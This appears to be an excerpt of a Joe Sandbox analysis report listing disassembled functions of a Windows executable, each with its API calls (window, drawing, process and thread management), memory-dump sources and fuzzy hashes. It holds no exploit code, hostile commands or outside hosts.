                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(009C1810,00000000,?,?,009C1810,009C1810,?,0097E2D6), ref: 0096E21B
                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0096E23F
                                                                                                                                                                                      • ShowWindow.USER32(009C1810,00000000,?,?,009C1810,009C1810,?,0097E2D6), ref: 0096E29F
                                                                                                                                                                                      • ShowWindow.USER32(?,00000004,?,?,009C1810,009C1810,?,0097E2D6), ref: 0096E2B1
                                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 0096E2D5
                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0096E2F8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                      • Opcode ID: a1f5bdbc5d821f01a3f8e8141715fa8a57672d1ea250b809ab5d9974a69fd647
                                                                                                                                                                                      • Instruction ID: d13c6c01074c157dbee48776e7726c15bdda661b200e5fda15f9e01ca43e276d
                                                                                                                                                                                      • Opcode Fuzzy Hash: a1f5bdbc5d821f01a3f8e8141715fa8a57672d1ea250b809ab5d9974a69fd647
                                                                                                                                                                                      • Instruction Fuzzy Hash: B5418238605145EFDB26CF14C4A9F947BEABF0A314F1841B9FA688F2A6C731A841CB51
                                                                                                                                                                                      Function 0093BC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0093BCD9
                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0093BCE0
                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0093BCEF
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 0093BCFA
                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0093BD29
                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 0093BD3D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                      • Opcode ID: 88516a9924227dc429ef1d70cd3758d76482cfc48f1d253b02541066227c67c4
                                                                                                                                                                                      • Instruction ID: cd30d2ca6dac2124989d5fe156ff08351eec3cca95605abee71621e1efb74481
                                                                                                                                                                                      • Opcode Fuzzy Hash: 88516a9924227dc429ef1d70cd3758d76482cfc48f1d253b02541066227c67c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: B9216D72105209ABDF119FA8ED49FEE7BADEF44318F144015FB01A62A0C776DE61EB60
                                                                                                                                                                                      Function 0096E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0091B5EB
                                                                                                                                                                                        • Part of subcall function 0091B58B: SelectObject.GDI32(?,00000000), ref: 0091B5FA
                                                                                                                                                                                        • Part of subcall function 0091B58B: BeginPath.GDI32(?), ref: 0091B611
                                                                                                                                                                                        • Part of subcall function 0091B58B: SelectObject.GDI32(?,00000000), ref: 0091B63B
                                                                                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0096E9F2
                                                                                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 0096EA06
                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0096EA14
                                                                                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 0096EA24
                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 0096EA34
                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 0096EA44
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                      • Opcode ID: cf5b25e9b2630dd2c1dc821a12226ecb997ba7d220f30e306e27727c664a089e
                                                                                                                                                                                      • Instruction ID: 53185eb0398d001423905a8dc8598fdd46c658e2f10dc384c271747c1005e6fc
                                                                                                                                                                                      • Opcode Fuzzy Hash: cf5b25e9b2630dd2c1dc821a12226ecb997ba7d220f30e306e27727c664a089e
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11097600414DBFDF029F94DC88EAA7FADEB08350F048021FA09991A1D7719D55EBA0
                                                                                                                                                                                      Function 0093EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0093EFB6
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0093EFC7
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093EFCE
                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0093EFD6
                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0093EFED
                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0093EFFF
                                                                                                                                                                                        • Part of subcall function 0093A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0093A79D,00000000,00000000,?,0093AB73), ref: 0093B2CA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 603618608-0
                                                                                                                                                                                      • Opcode ID: 225c5abb006717a9bf5522218558e793f74f33b78e4d309405fa263146dee476
                                                                                                                                                                                      • Instruction ID: 2d16d4271bdbfe54dd686301694f19b73964d68adac6d51da33bc61be0386f21
                                                                                                                                                                                      • Opcode Fuzzy Hash: 225c5abb006717a9bf5522218558e793f74f33b78e4d309405fa263146dee476
                                                                                                                                                                                      • Instruction Fuzzy Hash: 07012175A05219BBEB109BA59C49B5EBFB8EB48751F004066EA04EB3D0D6709D019FA1
                                                                                                                                                                                      Function 009287D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 009287D7
                                                                                                                                                                                        • Part of subcall function 00921E5A: __initp_misc_winsig.LIBCMT ref: 00921E7E
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00928BE1
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00928BF5
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00928C08
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00928C1B
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00928C2E
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00928C41
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00928C54
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00928C67
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00928C7A
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00928C8D
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00928CA0
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00928CB3
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00928CC6
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00928CD9
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00928CEC
                                                                                                                                                                                        • Part of subcall function 00921E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00928CFF
                                                                                                                                                                                      • __mtinitlocks.LIBCMT ref: 009287DC
                                                                                                                                                                                        • Part of subcall function 00928AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(009BAC68,00000FA0,?,?,009287E1,00926AFA,009B67D8,00000014), ref: 00928AD1
                                                                                                                                                                                      • __mtterm.LIBCMT ref: 009287E5
                                                                                                                                                                                        • Part of subcall function 0092884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009287EA,00926AFA,009B67D8,00000014), ref: 009289CF
                                                                                                                                                                                        • Part of subcall function 0092884D: _free.LIBCMT ref: 009289D6
                                                                                                                                                                                        • Part of subcall function 0092884D: DeleteCriticalSection.KERNEL32(009BAC68,?,?,009287EA,00926AFA,009B67D8,00000014), ref: 009289F8
                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0092880A
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00928833
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2942034483-0
                                                                                                                                                                                      • Opcode ID: 628a92ebcd956b7b4f8827daa9d4d9806c292d14c7dd608abb9b177842811b5c
                                                                                                                                                                                      • Instruction ID: 1b8b26fd37299ae6efffc357931275c90fb736a487f283c95584b2add47d74d2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 628a92ebcd956b7b4f8827daa9d4d9806c292d14c7dd608abb9b177842811b5c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF0BE3312F7316AE2247B78BC07B4B2AC88F81730B604A2AF470D54EEFF1198414261
                                                                                                                                                                                      Function 0094A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1423608774-0
                                                                                                                                                                                      • Opcode ID: 79bb1036971d8a779ac9fc72c22960c968a977072b46c6b3c3d7271aeac6c587
                                                                                                                                                                                      • Instruction ID: cb5fd6e983dc1129c126af608f0ae4f45502cccd730accc20e996117941cc7a2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 79bb1036971d8a779ac9fc72c22960c968a977072b46c6b3c3d7271aeac6c587
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D01A43615A211EBD7152F54ED88EEB777AFF89712B000529F503922E5EB70AC00DB51
                                                                                                                                                                                      Function 00901867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00901898
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 009018A0
                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009018AB
                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009018B6
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 009018BE
                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009018C6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                      • Opcode ID: c3953005abbbf0ef2e739941e057a5a5661563231c16a87390bd31a3f5081f38
                                                                                                                                                                                      • Instruction ID: effc9979cc995f468b8252aef26e621511ced063981ce03ac2e62351a7a237b4
                                                                                                                                                                                      • Opcode Fuzzy Hash: c3953005abbbf0ef2e739941e057a5a5661563231c16a87390bd31a3f5081f38
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D0144B0902B5ABDE3008F6A8C85A52FFA8FF19354F04411BA15C47A82C7B5A864CBE5
                                                                                                                                                                                      Function 009484F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00948504
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094851A
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00948529
                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00948538
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00948542
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00948549
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                      • Opcode ID: 027bfccbc91a951b64fd503b9d8ff10cb9a83978e667c22f60f86d9ae11eb731
                                                                                                                                                                                      • Instruction ID: 25ea6467d523029d3fca2ffae967fdca3e5e7b671fe7c80b7db002f540ab619f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 027bfccbc91a951b64fd503b9d8ff10cb9a83978e667c22f60f86d9ae11eb731
                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F09032216158BBE72017529C0EEEF3B7CDFC6B11F000058FA01D1190E7A02A01E7B4
                                                                                                                                                                                      Function 0094A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0094A330
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,009766D3,?,?,?,?,?,0090E681), ref: 0094A341
                                                                                                                                                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,009766D3,?,?,?,?,?,0090E681), ref: 0094A34E
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,009766D3,?,?,?,?,?,0090E681), ref: 0094A35B
                                                                                                                                                                                        • Part of subcall function 00949CCE: CloseHandle.KERNEL32(?,?,0094A368,?,?,?,009766D3,?,?,?,?,?,0090E681), ref: 00949CD8
                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0094A36E
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,009766D3,?,?,?,?,?,0090E681), ref: 0094A375
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                      • Opcode ID: 535014d5adcafc9a3f6238bfbe6eb6c1659546ef7ac95feec71717724c60ed50
                                                                                                                                                                                      • Instruction ID: d95ec8d9affa54f6d48d7a9941ded160903394379a2c373e700568f1141b7906
                                                                                                                                                                                      • Opcode Fuzzy Hash: 535014d5adcafc9a3f6238bfbe6eb6c1659546ef7ac95feec71717724c60ed50
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF0823615A211ABD3512F64ED8CEDB7B7AFF89712B000521F203912E5DBB59801EB51
                                                                                                                                                                                      Function 0091D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                        • Part of subcall function 0090BBD9: _memmove.LIBCMT ref: 0090BC33
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0091D98F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0091D832
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                                                                                      • Opcode ID: 2809a0ab6461b6f28ef3acab3dc12afa52c6f25009048c8cdad72da0abc81bc4
                                                                                                                                                                                      • Instruction ID: f14c82d76fd9135d2f4fcfeec19d0d5d4541c63325ffd2f393fa201161b7446e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2809a0ab6461b6f28ef3acab3dc12afa52c6f25009048c8cdad72da0abc81bc4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F917E72209315AFC714EF24C885EAEB7B9EFC5700F00495DF59A972A2EB20ED45CB52
                                                                                                                                                                                      Function 0095B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0095B4A8
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 0095B5B7
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0095B73A
                                                                                                                                                                                        • Part of subcall function 0094A6F6: VariantInit.OLEAUT32(00000000), ref: 0094A736
                                                                                                                                                                                        • Part of subcall function 0094A6F6: VariantCopy.OLEAUT32(?,?), ref: 0094A73F
                                                                                                                                                                                        • Part of subcall function 0094A6F6: VariantClear.OLEAUT32(?), ref: 0094A74B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
